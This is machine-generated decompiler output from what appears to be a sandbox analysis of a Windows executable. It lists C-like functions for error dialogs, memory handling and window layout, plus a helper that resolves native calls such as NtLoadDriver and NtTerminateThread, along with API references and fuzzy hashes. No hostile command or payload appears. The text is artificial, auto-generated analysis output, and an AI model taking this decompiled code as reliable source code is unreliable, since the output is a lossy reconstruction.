                                                                                      					_t16 = GetLastError();
                                                                                      				}
                                                                                      				E00404706(_t16,  &_v2052);
                                                                                      				_push( &_v2052);
                                                                                      				_push(_t16);
                                                                                      				_push(L"Error %d: %s");
                                                                                      				_push(0x400);
                                                                                      				_push( &_v4100);
                                                                                      				L0040B1EC();
                                                                                      				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
                                                                                      			}









                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                      • _snwprintf.MSVCRT ref: 00404813
                                                                                      • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                                      • String ID: Error$Error %d: %s
                                                                                      • API String ID: 313946961-1552265934
                                                                                      • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                      • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                      • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                      • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 90%
                                                                                      			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
                                                                                      				void* _v8;
                                                                                      				signed int _v12;
                                                                                      				void* __ebx;
                                                                                      				void* __ecx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t74;
                                                                                      				signed int _t76;
                                                                                      				signed short _t85;
                                                                                      				signed int _t87;
                                                                                      				intOrPtr _t88;
                                                                                      				signed short _t93;
                                                                                      				void* _t95;
                                                                                      				signed int _t124;
                                                                                      				signed int _t126;
                                                                                      				signed int _t128;
                                                                                      				intOrPtr* _t131;
                                                                                      				signed int _t135;
                                                                                      				signed int _t137;
                                                                                      				signed int _t138;
                                                                                      				void* _t141;
                                                                                      				void* _t142;
                                                                                      				void* _t146;
                                                                                      
                                                                                      				_t142 = __eflags;
                                                                                      				_push(_t102);
                                                                                      				_t131 = __eax;
                                                                                      				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
                                                                                      				E00406746(__eax);
                                                                                      				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
                                                                                      				_t135 = 5;
                                                                                      				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
                                                                                      				_t124 = 0x14;
                                                                                      				_t74 = _t135 * _t124;
                                                                                      				 *(_t131 + 0x2d0) = _t135;
                                                                                      				_push( ~(0 | _t142 > 0x00000000) | _t74);
                                                                                      				L0040B26C();
                                                                                      				 *(_t131 + 0x2d4) = _t74;
                                                                                      				_t126 = 0x14;
                                                                                      				_t76 = _t135 * _t126;
                                                                                      				_push( ~(0 | _t142 > 0x00000000) | _t76);
                                                                                      				L0040B26C();
                                                                                      				_t95 = 0x40f008;
                                                                                      				 *(_t131 + 0x40) = _t76;
                                                                                      				_v8 = 0x40f008;
                                                                                      				do {
                                                                                      					_t137 =  *_t95 * 0x14;
                                                                                      					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
                                                                                      					_t24 = _t95 + 0x14; // 0x40f01c
                                                                                      					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
                                                                                      					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
                                                                                      					_t141 = _t141 + 0x18;
                                                                                      					_v12 = _t85;
                                                                                      					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
                                                                                      					if((_t85 & 0xffff0000) == 0) {
                                                                                      						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
                                                                                      						_t93 = E00405B81(_v12 | 0x00010000);
                                                                                      						_t95 = _v8;
                                                                                      						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
                                                                                      					}
                                                                                      					_t95 = _t95 + 0x28;
                                                                                      					_t146 = _t95 - 0x40f0d0;
                                                                                      					_v8 = _t95;
                                                                                      				} while (_t146 < 0);
                                                                                      				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
                                                                                      				_t138 = 5;
                                                                                      				_t128 = 4;
                                                                                      				_t87 = _t138 * _t128;
                                                                                      				 *((intOrPtr*)(_t131 + 0x48)) = 1;
                                                                                      				 *(_t131 + 0x2c) = _t138;
                                                                                      				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
                                                                                      				_push( ~(0 | _t146 > 0x00000000) | _t87);
                                                                                      				L0040B26C();
                                                                                      				_push(0xc);
                                                                                      				 *(_t131 + 0x30) = _t87;
                                                                                      				L0040B26C();
                                                                                      				_t139 = _t87;
                                                                                      				if(_t87 == 0) {
                                                                                      					_t88 = 0;
                                                                                      					__eflags = 0;
                                                                                      				} else {
                                                                                      					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
                                                                                      				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
                                                                                      				 *((intOrPtr*)(_t131 + 0x50)) = 0;
                                                                                      				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
                                                                                      				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
                                                                                      				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
                                                                                      				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
                                                                                      				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
                                                                                      				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
                                                                                      				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
                                                                                      				return E0040686C(_t131);
                                                                                      			}


























                                                                                      0x00406a06
                                                                                      0x00406a08
                                                                                      0x00406a0b
                                                                                      0x00406a10
                                                                                      0x00406a16
                                                                                      0x00406a25
                                                                                      0x00406a25
                                                                                      0x00406a18
                                                                                      0x00406a1e
                                                                                      0x00406a1e
                                                                                      0x00406a27
                                                                                      0x00406a2f
                                                                                      0x00406a32
                                                                                      0x00406a35
                                                                                      0x00406a3b
                                                                                      0x00406a41
                                                                                      0x00406a47
                                                                                      0x00406a4d
                                                                                      0x00406a53
                                                                                      0x00406a5d
                                                                                      0x00406a6d

                                                                                      APIs
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                      • memcpy.MSVCRT ref: 0040696D
                                                                                      • memcpy.MSVCRT ref: 0040697E
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                        • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                        • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                        • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                        • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                        • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                      • String ID:
                                                                                      • API String ID: 975042529-0
                                                                                      • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                      • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                      • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                      • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 83%
                                                                                      			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                      				int _v8;
                                                                                      				int _v12;
                                                                                      				intOrPtr _v16;
                                                                                      				void* _v20;
                                                                                      				int _v24;
                                                                                      				void _v56;
                                                                                      				char _v584;
                                                                                      				char _v588;
                                                                                      				char _v41548;
                                                                                      				void* __edi;
                                                                                      				void* _t40;
                                                                                      				void _t46;
                                                                                      				intOrPtr _t47;
                                                                                      				intOrPtr* _t64;
                                                                                      				intOrPtr* _t66;
                                                                                      				intOrPtr _t67;
                                                                                      				intOrPtr _t71;
                                                                                      				int _t77;
                                                                                      				void* _t80;
                                                                                      				void* _t81;
                                                                                      				void* _t82;
                                                                                      				void* _t83;
                                                                                      
                                                                                      				E0040B550(0xa248, __ecx);
                                                                                      				_t77 = 0;
                                                                                      				_v8 = 0;
                                                                                      				E00408E31();
                                                                                      				_t40 =  *0x41c47c;
                                                                                      				if(_t40 != 0) {
                                                                                      					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
                                                                                      				}
                                                                                      				if(_v8 == _t77) {
                                                                                      					_v8 = 0x186a0;
                                                                                      				}
                                                                                      				_v8 = _v8 + 0x3e80;
                                                                                      				_push(_v8);
                                                                                      				L0040B26C();
                                                                                      				_t81 = _t40;
                                                                                      				_v20 = _t81;
                                                                                      				memset(_t81, _t77, _v8);
                                                                                      				_t83 = _t82 + 0x10;
                                                                                      				_v24 = _t77;
                                                                                      				E00408E31();
                                                                                      				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
                                                                                      				L5:
                                                                                      				while(1) {
                                                                                      					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
                                                                                      						L16:
                                                                                      						_t46 =  *_t81;
                                                                                      						_t77 = 0;
                                                                                      						if(_t46 == 0) {
                                                                                      							_push(_v20);
                                                                                      							L0040B272();
                                                                                      							return _t46;
                                                                                      						}
                                                                                      						_t81 = _t81 + _t46;
                                                                                      						continue;
                                                                                      					}
                                                                                      					_t47 = _a4;
                                                                                      					_t71 =  *((intOrPtr*)(_t47 + 0x34));
                                                                                      					_v12 = _t77;
                                                                                      					_v16 = _t71;
                                                                                      					if(_t71 <= _t77) {
                                                                                      						L10:
                                                                                      						_t66 = 0;
                                                                                      						L11:
                                                                                      						if(_t66 == 0) {
                                                                                      							E004090AF( &_v588);
                                                                                      							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                      							_t32 = _t81 + 0x20; // 0x20
                                                                                      							memcpy( &_v56, _t32, 8);
                                                                                      							_t83 = _t83 + 0x10;
                                                                                      							E004099ED(_a4 + 0x28,  &_v588);
                                                                                      						} else {
                                                                                      							_t26 = _t66 + 4; // 0x4
                                                                                      							_t72 = _t26;
                                                                                      							if( *_t26 == 0) {
                                                                                      								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
                                                                                      								_t28 = _t81 + 0x20; // 0x20
                                                                                      								memcpy(_t66 + 0x214, _t28, 8);
                                                                                      								_t83 = _t83 + 0x10;
                                                                                      							}
                                                                                      						}
                                                                                      						goto L16;
                                                                                      					}
                                                                                      					_t67 =  *((intOrPtr*)(_t81 + 0x44));
                                                                                      					_t80 = _t47 + 0x28;
                                                                                      					while(1) {
                                                                                      						_t64 = E00405A92(_v12, _t80);
                                                                                      						if( *_t64 == _t67) {
                                                                                      							break;
                                                                                      						}
                                                                                      						_v12 = _v12 + 1;
                                                                                      						if(_v12 < _v16) {
                                                                                      							continue;
                                                                                      						}
                                                                                      						goto L10;
                                                                                      					}
                                                                                      					_t66 = _t64;
                                                                                      					goto L11;
                                                                                      				}
                                                                                      			}


                                                                                      APIs
                                                                                        • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                        • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                      • memset.MSVCRT ref: 00409805
                                                                                      • memcpy.MSVCRT ref: 0040988A
                                                                                      • memcpy.MSVCRT ref: 004098C0
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                      • String ID:
                                                                                      • API String ID: 3641025914-0
                                                                                      • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                      • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                      • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                      • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 68%
                                                                                      			E004067AC(char** __edi) {
                                                                                      				void* __esi;
                                                                                      				void* _t9;
                                                                                      				void** _t11;
                                                                                      				char** _t15;
                                                                                      				char** _t24;
                                                                                      				void* _t25;
                                                                                      				char* _t28;
                                                                                      				char* _t29;
                                                                                      				char* _t30;
                                                                                      				char* _t31;
                                                                                      				char** _t33;
                                                                                      
                                                                                      				_t24 = __edi;
                                                                                      				 *__edi = "cf@";
                                                                                      				_t9 = E00406746(__edi);
                                                                                      				_t28 = __edi[5];
                                                                                      				if(_t28 != 0) {
                                                                                      					_t9 = E004055D1(_t9, _t28);
                                                                                      					_push(_t28);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t29 = _t24[4];
                                                                                      				if(_t29 != 0) {
                                                                                      					_t9 = E004055D1(_t9, _t29);
                                                                                      					_push(_t29);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t30 = _t24[3];
                                                                                      				if(_t30 != 0) {
                                                                                      					_t9 = E004055D1(_t9, _t30);
                                                                                      					_push(_t30);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t31 = _t24[2];
                                                                                      				if(_t31 != 0) {
                                                                                      					E004055D1(_t9, _t31);
                                                                                      					_push(_t31);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t15 = _t24;
                                                                                      				_pop(_t32);
                                                                                      				_push(_t24);
                                                                                      				_t33 = _t15;
                                                                                      				_t25 = 0;
                                                                                      				if(_t33[1] > 0 && _t33[0xd] > 0) {
                                                                                      					do {
                                                                                      						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
                                                                                      						_t25 = _t25 + 1;
                                                                                      					} while (_t25 < _t33[0xd]);
                                                                                      				}
                                                                                      				_t11 =  *( *_t33)();
                                                                                      				free( *_t11);
                                                                                      				return _t11;
                                                                                      			}

                                                                                      APIs
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                        • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                      • free.MSVCRT(00000000), ref: 00406839
                                                                                        • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??3@$free
                                                                                      • String ID:
                                                                                      • API String ID: 2241099983-0
                                                                                      • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                      • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                      • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                      • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                      				intOrPtr _v12;
                                                                                      				struct tagPOINT _v20;
                                                                                      				struct tagRECT _v36;
                                                                                      				int _t27;
                                                                                      				struct HWND__* _t30;
                                                                                      				struct HWND__* _t32;
                                                                                      
                                                                                      				_t30 = _a4;
                                                                                      				if((_a8 & 0x00000001) != 0) {
                                                                                      					_t32 = GetParent(_t30);
                                                                                      					GetWindowRect(_t30,  &_v20);
                                                                                      					GetClientRect(_t32,  &_v36);
                                                                                      					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                      					_t27 = _v36.right - _v12 - _v36.left;
                                                                                      					_v20.x = _t27;
                                                                                      					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                      				}
                                                                                      				if((_a8 & 0x00000002) != 0) {
                                                                                      					E00404FBB(_t30);
                                                                                      				}
                                                                                      				return 1;
                                                                                      			}

                                                                                      APIs
                                                                                      • GetParent.USER32(?), ref: 00405D0A
                                                                                      • GetWindowRect.USER32 ref: 00405D17
                                                                                      • GetClientRect.USER32 ref: 00405D22
                                                                                      • MapWindowPoints.USER32 ref: 00405D32
                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                      • String ID:
                                                                                      • API String ID: 4247780290-0
                                                                                      • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                      • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                      • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                      • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 89%
                                                                                      			E004083DC(void* __eax, int __ebx, void* _a4) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				void* _v16;
                                                                                      				void* _t20;
                                                                                      				void* _t21;
                                                                                      				signed int _t28;
                                                                                      				void* _t32;
                                                                                      				void* _t34;
                                                                                      
                                                                                      				_t20 = __eax;
                                                                                      				_v12 = _v12 & 0x00000000;
                                                                                      				_push(__ebx);
                                                                                      				_t28 = __eax - 1;
                                                                                      				L0040B26C();
                                                                                      				_v16 = __eax;
                                                                                      				if(_t28 > 0) {
                                                                                      					_t21 = _a4;
                                                                                      					_v8 = __ebx;
                                                                                      					_v8 =  ~_v8;
                                                                                      					_t32 = _t28 * __ebx + _t21;
                                                                                      					_a4 = _t21;
                                                                                      					do {
                                                                                      						memcpy(_v16, _a4, __ebx);
                                                                                      						memcpy(_a4, _t32, __ebx);
                                                                                      						_t20 = memcpy(_t32, _v16, __ebx);
                                                                                      						_a4 = _a4 + __ebx;
                                                                                      						_t32 = _t32 + _v8;
                                                                                      						_t34 = _t34 + 0x24;
                                                                                      						_v12 = _v12 + 1;
                                                                                      						_t28 = _t28 - 1;
                                                                                      					} while (_t28 > _v12);
                                                                                      				}
                                                                                      				_push(_v16);
                                                                                      				L0040B272();
                                                                                      				return _t20;
                                                                                      			}

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memcpy$??2@??3@
                                                                                      • String ID:
                                                                                      • API String ID: 1252195045-0
                                                                                      • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                      • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                      • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                      • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 76%
                                                                                      			E00406746(void* __esi) {
                                                                                      				intOrPtr _t9;
                                                                                      				intOrPtr _t10;
                                                                                      				intOrPtr _t11;
                                                                                      				intOrPtr* _t18;
                                                                                      				void* _t19;
                                                                                      
                                                                                      				_t19 = __esi;
                                                                                      				_t9 =  *((intOrPtr*)(__esi + 0x30));
                                                                                      				if(_t9 != 0) {
                                                                                      					_push(_t9);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t10 =  *((intOrPtr*)(_t19 + 0x40));
                                                                                      				if(_t10 != 0) {
                                                                                      					_push(_t10);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
                                                                                      				if(_t11 != 0) {
                                                                                      					_push(_t11);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
                                                                                      				if(_t18 != 0) {
                                                                                      					_t11 =  *_t18;
                                                                                      					if(_t11 != 0) {
                                                                                      						_push(_t11);
                                                                                      						L0040B272();
                                                                                      						 *_t18 = 0;
                                                                                      					}
                                                                                      					_push(_t18);
                                                                                      					L0040B272();
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
                                                                                      				 *((intOrPtr*)(_t19 + 0x30)) = 0;
                                                                                      				 *((intOrPtr*)(_t19 + 0x40)) = 0;
                                                                                      				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
                                                                                      				return _t11;
                                                                                      			}









                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: ??3@
                                                                                      • String ID:
                                                                                      • API String ID: 613200358-0
                                                                                      • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                      • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                      • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                      • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 87%
                                                                                      			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                      				struct HDWP__* _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				void* __ebx;
                                                                                      				intOrPtr _t37;
                                                                                      				intOrPtr _t42;
                                                                                      				RECT* _t44;
                                                                                      
                                                                                      				_push(__ecx);
                                                                                      				_push(__ecx);
                                                                                      				_t42 = __ecx;
                                                                                      				_v12 = __ecx;
                                                                                      				if(_a4 != 5) {
                                                                                      					if(_a4 != 0xf) {
                                                                                      						if(_a4 == 0x24) {
                                                                                      							_t37 = _a12;
                                                                                      							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
                                                                                      							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
                                                                                      						}
                                                                                      					} else {
                                                                                      						E00402EC8(__ecx + 0x378);
                                                                                      					}
                                                                                      				} else {
                                                                                      					_v8 = BeginDeferWindowPos(3);
                                                                                      					_t44 = _t42 + 0x378;
                                                                                      					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
                                                                                      					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
                                                                                      					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
                                                                                      					EndDeferWindowPos(_v8);
                                                                                      					InvalidateRect( *(_t44 + 0x10), _t44, 1);
                                                                                      					_t42 = _v12;
                                                                                      				}
                                                                                      				return E00402CED(_t42, _a4, _a8, _a12);
